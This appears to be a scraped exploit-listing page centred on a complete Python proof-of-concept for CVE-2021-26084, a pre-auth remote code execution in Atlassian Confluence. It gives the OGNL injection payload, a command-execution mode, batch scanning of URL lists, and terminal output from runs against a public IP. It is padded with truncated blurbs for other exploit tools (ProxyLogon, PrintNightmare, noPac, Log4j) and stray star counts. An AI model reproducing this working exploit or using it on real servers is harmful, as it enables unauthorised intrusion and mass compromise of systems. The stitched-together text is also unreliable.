CVE-2021-26084 Remote Code Execution on Confluence Servers.
Fofa:
app="ATLASSIAN-Confluence"
Show help information.
python PoC.py
Vulnerability verification for individual websites.
python PoC.py -u https://1.1.1.1
Command execution.
python PoC.py -u https://1.1.1.1 -e 'cat /etc/passwd'
Batch testing.
python PoC.py -f urls.txt
CVE-2021-22911 Pre-Auth Blind NoSQL Injection leading to Remote Code Execution in Rocket Chat 3.12.1 The getPasswordPolicy method is vulnerable to NoS
CVE-2019-19609 Strapi Framework Vulnerable to Remote Code Execution well, I didnt found any exploit for CVE-2019-19609 so I wrote one. :/ Usage pytho
CVE-2012-2982 John Hammond | September 4th, 2021 Checking searchsploit for Webmin 1.580 I only saw a Metasploit module for the /file/show.cgi Remote C
Log4j2 Vulnerability Local Scanner (CVE-2021-45046) Log4j 漏洞本地检测脚本,扫描主机上所有java进程,检测是否引入了有漏洞的log4j-core jar包,是否可能遭到远程代码执行攻击(CVE-2021-45046)。上传扫描报告到指定的服
ProxyLogon For Python3 ProxyLogon(CVE-2021-26855+CVE-2021-27065) Exchange Server RCE(SSRF-GetWebShell) usage: python ProxyLogon.py --host=exchang
PrintNightmare Python implementation for PrintNightmare (CVE-2021-1675 / CVE-2021-34527) using standard Impacket. Installtion $ pip3 install impacket
Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user Known issues it will not work outside kali , i will update it
noPac Exploiting CVE-2021-42278 and CVE-2021-42287 原项目noPac在实现上可能有点问题,导致在本地没有打通,于是参考sam-the-admin项目进行修改。 使用 pip3 install -r requirements.txt # GetShel
About Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user Changed from sam-the-admin. Usage SAM THE ADMIN CVE-202
第56行修改method="POST" 为method="post"
附上可用的code:
47 Nov 9, 2022
7 Mar 8, 2022
25 Dec 8, 2022
86 Dec 9, 2022
112 Dec 1, 2022
140 Dec 27, 2022
867 Dec 22, 2022
2 Jun 23, 2022
500 Jan 6, 2023
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
"""
@File : PoC.py
@Time : 2021/09/01 14:16:26
@Author : _0xf4n9x_
@Version : 1.0
@Contact : [email protected]
"""
import requests
import sys
import os
import urllib3
import argparse
from bs4 import BeautifulSoup
urllib3.disable_warnings()
def usage():
print("Eg: \n python3 PoC.py -u http://127.0.0.1")
print(" python3 PoC.py -u httts://127.0.0.1 -e 'cat /etc/passwd'")
print(" python3 PoC.py -f urls.txt")
def poc(host):
url = host + "/pages/doenterpagevariables.action"
headers = {
"User-Agent": "Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1",
"Content-Type": "application/x-www-form-urlencoded"}
params = {"queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022ifconfig\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"}
try:
res = requests.post(url, headers=headers, data=params,
timeout=10, verify=False)
if 'netmask' and 'inet' and 'netmask' in res.text:
print("[+] " + host + " is vulnerable!")
return 1
else:
print("[-] " + host + " is not vulnerable!")
except:
pass
def exp(host, command):
url = host + "/pages/doenterpagevariables.action"
headers = {
"User-Agent": "Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1",
"Content-Type": "application/x-www-form-urlencoded"}
params = {
"queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022" + command + "\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"}
res = requests.post(url, headers=headers, data=params,
timeout=10, verify=False).text
print(res)
soup = BeautifulSoup(res, "html5lib")
content = soup.find(method="post").find_all('input')[1]["value"]
print(content.replace('aaaaaaaa[', '').replace('\n]', ''))
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description="CVE-2021-26084 Remote Code Execution on Confluence Servers")
parser.add_argument('-u', '--url', type=str,
help="vulnerability verification for individual websites")
parser.add_argument('-e', '--exec', type=str,
help="command execution")
parser.add_argument('-f', '--file', type=str,
help="perform vulnerability checks on multiple websites in a file, and the vulnerable websites will be output to the success.txt file")
args = parser.parse_args()
if len(sys.argv) == 3:
if sys.argv[1] in ['-u', '--url']:
poc(args.url)
elif sys.argv[1] in ['-f', '--file']:
if os.path.isfile(args.file) == True:
with open(args.file) as target:
hosts = []
hosts = target.read().splitlines()
for host in hosts:
if poc(host) == 1:
with open("success.txt", "a+") as f:
f.write(host + "\n")
elif len(sys.argv) == 5:
if set([sys.argv[1], sys.argv[3]]) < set(['-u', '--url', '-e', '--exec']):
if poc(args.url) == 1:
exp(args.url, args.exec)
else:
parser.print_help()
usage()
root@ubuntu:~/CVE-2021-26084# python3 PoC.py -u http://51.75.89.1/
[+] http://51.75.89.114//pages/createpage-entervariables.action?SpaceKey=x is vulnerable!
root@ubuntu:~/CVE-2021-26084# python3 PoC.py -u http://51.75.89.1/ -e whoami
[+] http://51.75.89.114//pages/createpage-entervariables.action?SpaceKey=x is vulnerable!
Traceback (most recent call last):
File "PoC.py", line 100, in
CVE-2021-26084 Description POC of CVE-2021-26084, which is Atlassian Confluence Server OGNL(Object-Graph Navigation Language) Pre-Auth RCE Injection V
ExProlog ProxyLogon Full Exploit Chain PoC (CVE-2021–26855, CVE-2021–26857, CVE-2021–26858, CVE-2021–27065) Usage: exprolog.py [OPTIONS] ExProlog -
Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files tha
Log4jCenter Exploiting CVE-2021-44228 in vCenter for remote code execution and more. Blog post detailing exploitation linked below: COMING SOON Why? P
Log4jUnifi Exploiting CVE-2021-44228 in Unifi Network Application for remote cod
Log4jHorizon Exploiting CVE-2021-44228 in VMWare Horizon for remote code execution and more. BLOG COMING SOON Code and README.md this time around are
ApacheRCE ApacheRCE is a small little python script that will allow you to input the apache version 2.4.49-2.4.50 and then input a list of ip addresse
CVE-2022-21907 Description POC for CVE-2022-21907: HTTP Protocol Stack Remote Code Execution Vulnerability. create by antx at 2022-01-17. Detail HTTP
dnspooq DNSpooq PoC - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685) For educational purposes only Requirements Docker compo
Gitlab RCE - Remote Code Execution RCE for old gitlab version <= 11.4.7 & 12.4.0-12.8.1 LFI for old gitlab versions 10.4 - 12.8.1 This is an exploit f
9 Aug 31, 2022
130 Dec 15, 2022
2 Dec 30, 2021
81 Dec 20, 2022
3 Dec 4, 2022
365 Nov 30, 2022
80 Nov 28, 2022
153 Nov 9, 2022